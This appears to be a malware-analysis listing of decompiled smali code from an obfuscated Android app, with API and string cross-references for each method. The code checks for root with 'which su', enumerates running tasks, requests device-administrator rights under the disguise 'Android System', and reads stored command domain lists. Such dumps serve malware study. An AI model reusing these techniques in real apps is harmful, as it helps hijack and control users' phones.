47if-eqz v0, :cond_70
49sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
50goto_41:
51invoke-virtual {v1, v3, v0}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
52move-result-object v0
53check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
55const-string v3, "model"
57sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
58if-eqz v1, :cond_73
60sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
61goto_4f:
62invoke-virtual {v0, v3, v1}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
63move-result-object v0
64check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
66const-string v1, "version"
67new-instance v3, Ljava/lang/StringBuilder;
69invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
70sget v4, Landroid/os/Build$VERSION;->SDK_INT:I
72invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
73move-result-object v3
75invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
76move-result-object v3
78invoke-virtual {v0, v1, v3}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
79move-result-object v0
80check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
82invoke-virtual {v2, v0}, Lmpcom/crashlytics/android/answers/Answers;->logCustom(Lmpcom/crashlytics/android/answers/CustomEvent;)V
83cond_6f: return-void
84cond_70:
85const-string v0, ""
86goto/16 :goto_41
87cond_73:
88const-string v1, ""
89goto/16 :goto_4f
Cross References
APIs
  • java.util.HashMap.<init>
  • android.content.SharedPreferences.getString
  • android.text.TextUtils.isEmpty
  • org.json.JSONObject.<init>
  • org.json.JSONObject.keys
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.Integer.valueOf
  • org.json.JSONObject.getJSONObject
  • java.util.HashMap.put
  • org.json.JSONException.printStackTrace
Strings
  • wbhugwreo
Position Instruction Meta Information
0new-instance v1, Ljava/util/HashMap;
2invoke-direct {v1}, Ljava/util/HashMap;-><init>()V
3try_start_5:
4iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
6const-string v2, "wbhugwreo"
8const-string v3, ""
10invoke-interface {v0, v2, v3}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
11move-result-object v0
13invoke-static {v0}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
14move-result v2
15if-eqz v2, :cond_17
16move-object v0, v1
17goto_16: return-object v0
18cond_17: new-instance v2, Lorg/json/JSONObject;
20invoke-direct {v2, v0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
22invoke-virtual {v2}, Lorg/json/JSONObject;->keys()Ljava/util/Iterator;
23move-result-object v3
24goto_20:
25invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
26move-result v0
27if-eqz v0, :cond_40
29invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
30move-result-object v0
31check-cast v0, Ljava/lang/String;
33invoke-static {v0}, Ljava/lang/Integer;->valueOf(Ljava/lang/String;)Ljava/lang/Integer;
34move-result-object v4
36invoke-virtual {v2, v0}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
37move-result-object v0
39invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->DiXsQ(Lorg/json/JSONObject;)Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
40move-result-object v0
42invoke-virtual {v1, v4, v0}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
43try_end_3b: goto/16 :goto_20
44catch_3c: move-exception v0
46invoke-virtual {v0}, Lorg/json/JSONException;->printStackTrace()V
47cond_40: move-object v0, v1
48goto/16 :goto_16
APIs
  • android.content.Context.getPackageManager
  • android.content.Context.getPackageName
  • android.content.pm.PackageManager.checkPermission
  • android.net.wifi.WifiManager$WifiLock.release
  • android.os.PowerManager$WakeLock.release
  • android.app.Service.stopForeground
  • android.app.Service.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
  • android.os.Handler.postDelayed
Strings
  • android.permission.WAKE_LOCK
Position Instruction Meta Information
0const/4 v3, 0x0
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
4invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)Landroid/content/Context;
5move-result-object v0
7invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->LmcGi(Landroid/content/Context;)Z
8move-result v0
9if-eqz v0, :cond_59
11iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
13invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)Z
14move-result v0
15if-eqz v0, :cond_59
17iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
19invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)Landroid/content/Context;
20move-result-object v0
22invoke-virtual {v0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
23move-result-object v1
25const-string v2, "android.permission.WAKE_LOCK"
27invoke-virtual {v0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
28move-result-object v0
30invoke-virtual {v1, v2, v0}, Landroid/content/pm/PackageManager;->checkPermission(Ljava/lang/String;Ljava/lang/String;)I
31move-result v0
32if-nez v0, :cond_41
34sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->DiXsQ:Landroid/net/wifi/WifiManager$WifiLock;
35if-eqz v0, :cond_34
37sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->DiXsQ:Landroid/net/wifi/WifiManager$WifiLock;
39invoke-virtual {v0}, Landroid/net/wifi/WifiManager$WifiLock;->release()V
40cond_34: sput-object v3, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->DiXsQ:Landroid/net/wifi/WifiManager$WifiLock;
42sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->Odjrct:Landroid/os/PowerManager$WakeLock;
43if-eqz v0, :cond_3f
45sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->Odjrct:Landroid/os/PowerManager$WakeLock;
47invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->release()V
48cond_3f: sput-object v3, Lcom/czybg/eqtbdmzpklrgyns/QZjOxmUK;->Odjrct:Landroid/os/PowerManager$WakeLock;
49cond_41:
50iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
52invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->LmcGi(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)V
54iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;->DiXsQ:Landroid/app/Service;
55const/4 v1, 0x1
57invoke-virtual {v0, v1}, Landroid/app/Service;->stopForeground(Z)V
59iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;->DiXsQ:Landroid/app/Service;
61invoke-virtual {v0}, Landroid/app/Service;->stopSelf()V
63invoke-static {}, Landroid/os/Process;->myPid()I
64move-result v0
66invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
67goto_58: return-void
68cond_59:
69iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/yCJnDqab;->Odjrct:Landroid/os/Handler;
70const-wide/32 v1, 0x1d4c0
72invoke-virtual {v0, p0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
73goto/16 :goto_58
Cross References
APIs
  • java.lang.Runtime.getRuntime
  • java.lang.Runtime.exec
  • java.lang.Process.getInputStream
  • java.io.InputStreamReader.<init>
  • java.io.BufferedReader.<init>
  • java.io.BufferedReader.readLine
  • java.lang.Process.destroy
Strings
  • /system/xbin/which
  • su
Position Instruction Meta Information
0const/4 v0, 0x1
1const/4 v1, 0x0
2const/4 v2, 0x0
3try_start_3:
4invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
5move-result-object v3
6const/4 v4, 0x2
7new-array v4, v4, [Ljava/lang/String;
8const/4 v5, 0x0
10const-string v6, "/system/xbin/which"
11aput-object v6, v4, v5
12const/4 v5, 0x1
14const-string v6, "su"
15aput-object v6, v4, v5
17invoke-virtual {v3, v4}, Ljava/lang/Runtime;->exec([Ljava/lang/String;)Ljava/lang/Process;
18try_end_17: move-result-object v2
19try_start_18: new-instance v3, Ljava/io/BufferedReader;
20new-instance v4, Ljava/io/InputStreamReader;
22invoke-virtual {v2}, Ljava/lang/Process;->getInputStream()Ljava/io/InputStream;
23move-result-object v5
25invoke-direct {v4, v5}, Ljava/io/InputStreamReader;-><init>(Ljava/io/InputStream;)V
27invoke-direct {v3, v4}, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
29invoke-virtual {v3}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
30try_end_29: move-result-object v3
31if-eqz v3, :cond_32
32goto_2c: if-eqz v2, :cond_31
33try_start_2e:
34invoke-virtual {v2}, Ljava/lang/Process;->destroy()V
35cond_31: return v0
36cond_32: move v0, v1
37goto/16 :goto_2c
38catch_34: move-exception v0
39move-object v0, v2
40goto_36: if-eqz v0, :cond_3b
41try_start_38:
42invoke-virtual {v0}, Ljava/lang/Process;->destroy()V
43cond_3b: move v0, v1
44goto/16 :goto_31
45catchall_3d: move-exception v0
46if-eqz v2, :cond_43
47try_start_40:
48invoke-virtual {v2}, Ljava/lang/Process;->destroy()V
49goto_43: throw v0
50catch_44: move-exception v1
51goto/16 :goto_31
52catch_46: move-exception v0
53goto/16 :goto_3b
54catch_48: move-exception v1
55goto/16 :goto_43
56catch_4a: move-exception v0
57move-object v0, v2
58goto/16 :goto_36
Cross References
APIs
  • java.util.ArrayList.<init>
  • android.content.SharedPreferences.getString
  • android.text.TextUtils.isEmpty
  • org.json.JSONArray.<init>
  • org.json.JSONArray.length
  • org.json.JSONArray.getInt
  • java.lang.Integer.valueOf
  • java.util.List.add
  • org.json.JSONException.printStackTrace
Strings
  • sahdhsaheqawvbcvnbzx
Position Instruction Meta Information
0new-instance v0, Ljava/util/ArrayList;
2invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
3try_start_5:
4iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
6const-string v2, "sahdhsaheqawvbcvnbzx"
8const-string v3, ""
10invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
11move-result-object v1
13invoke-static {v1}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
14move-result v2
15if-eqz v2, :cond_16
16cond_15: return-object v0
17cond_16: new-instance v2, Lorg/json/JSONArray;
19invoke-direct {v2, v1}, Lorg/json/JSONArray;-><init>(Ljava/lang/String;)V
20const/4 v1, 0x0
21goto_1c:
22invoke-virtual {v2}, Lorg/json/JSONArray;->length()I
23move-result v3
24if-ge v1, v3, :cond_15
26invoke-virtual {v2, v1}, Lorg/json/JSONArray;->getInt(I)I
27move-result v3
29invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
30move-result-object v3
32invoke-interface {v0, v3}, Ljava/util/List;->add(Ljava/lang/Object;)Z
33try_end_2d: add-int/lit8 v1, v1, 0x1
34goto/16 :goto_1c
35catch_30: move-exception v1
37invoke-virtual {v1}, Lorg/json/JSONException;->printStackTrace()V
38goto/16 :goto_15
Cross References
APIs
  • android.content.Context.getResources
  • android.content.Context.getPackageName
  • android.content.res.Resources.getIdentifier
  • android.content.res.Resources.getBoolean
  • android.content.Context.getSharedPreferences
  • android.content.SharedPreferences.getBoolean
Strings
  • hIc
  • bool
  • loader
  • hic
Position Instruction Meta Information
0const/4 v4, 0x0
1try_start_1:
2invoke-virtual {p0}, Landroid/content/Context;->getResources()Landroid/content/res/Resources;
3move-result-object v0
5const-string v1, "hIc"
7const-string v2, "bool"
9invoke-virtual {p0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
10move-result-object v3
12invoke-virtual {v0, v1, v2, v3}, Landroid/content/res/Resources;->getIdentifier(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)I
13move-result v1
15invoke-virtual {v0, v1}, Landroid/content/res/Resources;->getBoolean(I)Z
16try_end_14: move-result v0
17goto_15: return v0
18catch_16: move-exception v0
20const-string v0, "loader"
22invoke-virtual {p0, v0, v4}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
23move-result-object v0
25const-string v1, "hic"
27invoke-interface {v0, v1, v4}, Landroid/content/SharedPreferences;->getBoolean(Ljava/lang/String;Z)Z
28move-result v0
29goto/16 :goto_15
Cross References
APIs
  • java.util.ArrayList.<init>
  • android.content.Context.getSystemService
  • android.app.ActivityManager.getRunningTasks
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • android.content.ComponentName.getPackageName
  • java.util.ArrayList.add
Strings
  • activity
Position Instruction Meta Information
0new-instance v1, Ljava/util/ArrayList;
2invoke-direct {v1}, Ljava/util/ArrayList;-><init>()V
4const-string v0, "activity"
6invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
7move-result-object v0
8check-cast v0, Landroid/app/ActivityManager;
9const v2, 0x7fffffff
11invoke-virtual {v0, v2}, Landroid/app/ActivityManager;->getRunningTasks(I)Ljava/util/List;
12move-result-object v0
14invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
15move-result-object v2
16cond_18:
17invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
18move-result v0
19if-eqz v0, :cond_32
21invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
22move-result-object v0
23check-cast v0, Landroid/app/ActivityManager$RunningTaskInfo;
25iget-object v3, v0, Landroid/app/ActivityManager$RunningTaskInfo;->baseActivity:Landroid/content/ComponentName;
26if-eqz v3, :cond_18
28iget-object v0, v0, Landroid/app/ActivityManager$RunningTaskInfo;->baseActivity:Landroid/content/ComponentName;
30invoke-virtual {v0}, Landroid/content/ComponentName;->getPackageName()Ljava/lang/String;
31move-result-object v0
33invoke-virtual {v1, v0}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
34goto/16 :goto_18
35cond_32: return-object v1
Cross References
APIs
  • android.content.ComponentName.<init>
  • android.content.Intent.<init>
  • android.content.Intent.putExtra
  • android.app.Activity.startActivity
Strings
  • android.app.action.ADD_DEVICE_ADMIN
  • android.app.extra.DEVICE_ADMIN
  • android.app.extra.ADD_EXPLANATION
  • Android System
Position Instruction Meta Information
0new-instance v0, Landroid/content/ComponentName;
1const-class v1, Lcom/czybg/eqtbdmzpklrgyns/BYdZZAIwCWFdZwW;
3invoke-direct {v0, p0, v1}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
4new-instance v1, Landroid/content/Intent;
6const-string v2, "android.app.action.ADD_DEVICE_ADMIN"
8invoke-direct {v1, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
10const-string v2, "android.app.extra.DEVICE_ADMIN"
12invoke-virtual {v1, v2, v0}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
14const-string v0, "android.app.extra.ADD_EXPLANATION"
16const-string v2, "Android System"
18invoke-virtual {v1, v0, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
20invoke-virtual {p0, v1}, Landroid/app/Activity;->startActivity(Landroid/content/Intent;)V
21return-void
Cross References
APIs
  • android.net.ConnectivityManager.getNetworkInfo
  • android.net.NetworkInfo.getState
  • android.net.ConnectivityManager.getNetworkInfo
  • android.net.NetworkInfo.getState
  • android.net.ConnectivityManager.getActiveNetworkInfo
  • android.net.NetworkInfo.getType
Strings
  • wifi
  • mobile
Position Instruction Meta Information
0const/4 v1, 0x0
1const/4 v0, 0x1
2sget v2, Landroid/os/Build$VERSION;->SDK_INT:I
3const/16 v3, 0x17
4if-ge v2, v3, :cond_2a
6iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->Odjrct:Landroid/net/ConnectivityManager;
8invoke-virtual {v2, v0}, Landroid/net/ConnectivityManager;->getNetworkInfo(I)Landroid/net/NetworkInfo;
9move-result-object v0
11invoke-virtual {v0}, Landroid/net/NetworkInfo;->getState()Landroid/net/NetworkInfo$State;
12move-result-object v0
14sget-object v2, Landroid/net/NetworkInfo$State;->CONNECTED:Landroid/net/NetworkInfo$State;
15if-ne v0, v2, :cond_19
17const-string v0, "wifi"
18goto_18: return-object v0
19cond_19:
20iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->Odjrct:Landroid/net/ConnectivityManager;
22invoke-virtual {v0, v1}, Landroid/net/ConnectivityManager;->getNetworkInfo(I)Landroid/net/NetworkInfo;
23move-result-object v0
25invoke-virtual {v0}, Landroid/net/NetworkInfo;->getState()Landroid/net/NetworkInfo$State;
26move-result-object v0
28sget-object v1, Landroid/net/NetworkInfo$State;->CONNECTED:Landroid/net/NetworkInfo$State;
29if-ne v0, v1, :cond_48
31const-string v0, "mobile"
32goto/16 :goto_18
33cond_2a:
34iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->Odjrct:Landroid/net/ConnectivityManager;
36invoke-virtual {v2}, Landroid/net/ConnectivityManager;->getActiveNetworkInfo()Landroid/net/NetworkInfo;
37move-result-object v2
38if-eqz v2, :cond_3d
40invoke-virtual {v2}, Landroid/net/NetworkInfo;->getType()I
41move-result v2
42if-ne v2, v0, :cond_3d
43goto_38: if-eqz v0, :cond_3f
45const-string v0, "wifi"
46goto/16 :goto_18
47cond_3d: move v0, v1
48goto/16 :goto_38
49cond_3f:
50invoke-direct {p0}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->CyGFDR()Z
51move-result v0
52if-eqz v0, :cond_48
54const-string v0, "mobile"
55goto/16 :goto_18
56cond_48: const/4 v0, 0x0
57goto/16 :goto_18
Cross References
APIs
  • java.util.ArrayList.<init>
  • android.content.SharedPreferences.getString
  • android.text.TextUtils.isEmpty
  • org.json.JSONArray.<init>
  • org.json.JSONArray.length
  • org.json.JSONArray.getString
  • java.util.List.add
Strings
  • domains
Position Instruction Meta Information
0new-instance v0, Ljava/util/ArrayList;
2invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
3try_start_5:
4iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ:Landroid/content/SharedPreferences;
6const-string v2, "domains"
8const-string v3, ""
10invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
11move-result-object v1
13invoke-static {v1}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
14move-result v2
15if-eqz v2, :cond_16
16cond_15: return-object v0
17cond_16: new-instance v2, Lorg/json/JSONArray;
19invoke-direct {v2, v1}, Lorg/json/JSONArray;-><init>(Ljava/lang/String;)V
20const/4 v1, 0x0
21goto_1c:
22invoke-virtual {v2}, Lorg/json/JSONArray;->length()I
23move-result v3
24if-ge v1, v3, :cond_15
26invoke-virtual {v2, v1}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
27move-result-object v3
29invoke-static {v3}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ(Ljava/lang/String;)Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
30move-result-object v3
32invoke-interface {v0, v3}, Ljava/util/List;->add(Ljava/lang/Object;)Z
33try_end_2d: add-int/lit8 v1, v1, 0x1
34goto/16 :goto_1c
35catch_30: move-exception v1
36goto/16 :goto_15
Cross References
APIs
  • java.util.ArrayList.<init>
  • android.content.SharedPreferences.getString
  • android.text.TextUtils.isEmpty
  • org.json.JSONArray.<init>
  • org.json.JSONArray.length
  • org.json.JSONArray.getString
  • java.util.List.add
Strings
  • SleepingDomains
Position Instruction Meta Information
0new-instance v0, Ljava/util/ArrayList;
2invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
3try_start_5:
4iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ:Landroid/content/SharedPreferences;
6const-string v2, "SleepingDomains"
8const-string v3, ""
10invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
11move-result-object v1
13invoke-static {v1}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
14move-result v2
15if-eqz v2, :cond_16
16cond_15: return-object v0
17cond_16: new-instance v2, Lorg/json/JSONArray;
19invoke-direct {v2, v1}, Lorg/json/JSONArray;-><init>(Ljava/lang/String;)V
20const/4 v1, 0x0
21goto_1c:
22invoke-virtual {v2}, Lorg/json/JSONArray;->length()I
23move-result v3
24if-ge v1, v3, :cond_15
26invoke-virtual {v2, v1}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
27move-result-object v3
29invoke-static {v3}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ(Ljava/lang/String;)Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
30move-result-object v3
32invoke-interface {v0, v3}, Ljava/util/List;->add(Ljava/lang/Object;)Z
33try_end_2d: add-int/lit8 v1, v1, 0x1
34goto/16 :goto_1c
35catch_30: move-exception v1
36goto/16 :goto_15
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • android.content.SharedPreferences.getString
  • android.text.TextUtils.isEmpty
  • org.json.JSONObject.<init>
Strings
  • rpwehwcnh4hbsd
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
2new-instance v1, Ljava/lang/StringBuilder;
4const-string v2, "rpwehwcnh4hbsd"
6invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
8invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
9move-result-object v1
11invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
12move-result-object v1
14const-string v2, ""
16invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
17move-result-object v0
19invoke-static {v0}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
20move-result v1
21if-eqz v1, :cond_1f
22const/4 v0, 0x0
23goto_1e: return-object v0
24cond_1f: new-instance v1, Lorg/json/JSONObject;
26invoke-direct {v1, v0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
28invoke-static {p1, v1}, Lcom/czybg/eqtbdmzpklrgyns/Module;->fromJson(Landroid/content/Context;Lorg/json/JSONObject;)Lcom/czybg/eqtbdmzpklrgyns/Module;
29move-result-object v0
30goto/16 :goto_1e
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.BMcoejIXiwV.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Strings
  • kill
Position Instruction Meta Information
0if-eqz p1, :cond_21
2invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
3move-result-object v0
4if-eqz v0, :cond_21
6invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
7move-result-object v0
9const-string v1, "kill"
11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
12move-result v0
13if-eqz v0, :cond_21
14const/4 v0, 0x0
15iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/BMcoejIXiwV;->DiXsQ:Z
17invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/BMcoejIXiwV;->stopSelf()V
19invoke-static {}, Landroid/os/Process;->myPid()I
20move-result v0
22invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
23cond_21: const/4 v0, 0x1
24return v0
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.HOtny8Tb.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Strings
  • kill
Position Instruction Meta Information
0if-eqz p1, :cond_21
2invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
3move-result-object v0
4if-eqz v0, :cond_21
6invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
7move-result-object v0
9const-string v1, "kill"
11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
12move-result v0
13if-eqz v0, :cond_21
14const/4 v0, 0x0
15iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/HOtny8Tb;->DiXsQ:Z
17invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/HOtny8Tb;->stopSelf()V
19invoke-static {}, Landroid/os/Process;->myPid()I
20move-result v0
22invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
23cond_21: const/4 v0, 0x1
24return v0
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.KdfKw0C.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Strings
  • kill
Position Instruction Meta Information
0if-eqz p1, :cond_21
2invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
3move-result-object v0
4if-eqz v0, :cond_21
6invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
7move-result-object v0
9const-string v1, "kill"
11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
12move-result v0
13if-eqz v0, :cond_21
14const/4 v0, 0x0
15iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/KdfKw0C;->DiXsQ:Z
17invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/KdfKw0C;->stopSelf()V
19invoke-static {}, Landroid/os/Process;->myPid()I
20move-result v0
22invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
23cond_21: const/4 v0, 0x1
24return v0
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h9.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Strings
  • kill
Position Instruction Meta Information
0if-eqz p1, :cond_21
2invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
3move-result-object v0
4if-eqz v0, :cond_21
6invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
7move-result-object v0
9const-string v1, "kill"
11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
12move-result v0
13if-eqz v0, :cond_21
14const/4 v0, 0x0
15iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h9;->DiXsQ:Z
17invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h9;->stopSelf()V
19invoke-static {}, Landroid/os/Process;->myPid()I
20move-result v0
22invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
23cond_21: const/4 v0, 0x1
24return v0
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.O0qC6jwgEnHh.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Strings
  • kill
Position Instruction Meta Information
0if-eqz p1, :cond_21
2invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
3move-result-object v0
4if-eqz v0, :cond_21
6invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
7move-result-object v0
9const-string v1, "kill"
11invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
12move-result v0
13if-eqz v0, :cond_21
14const/4 v0, 0x0
15iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/O0qC6jwgEnHh;->DiXsQ:Z
17invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/O0qC6jwgEnHh;->stopSelf()V
19invoke-static {}, Landroid/os/Process;->myPid()I
20move-result v0
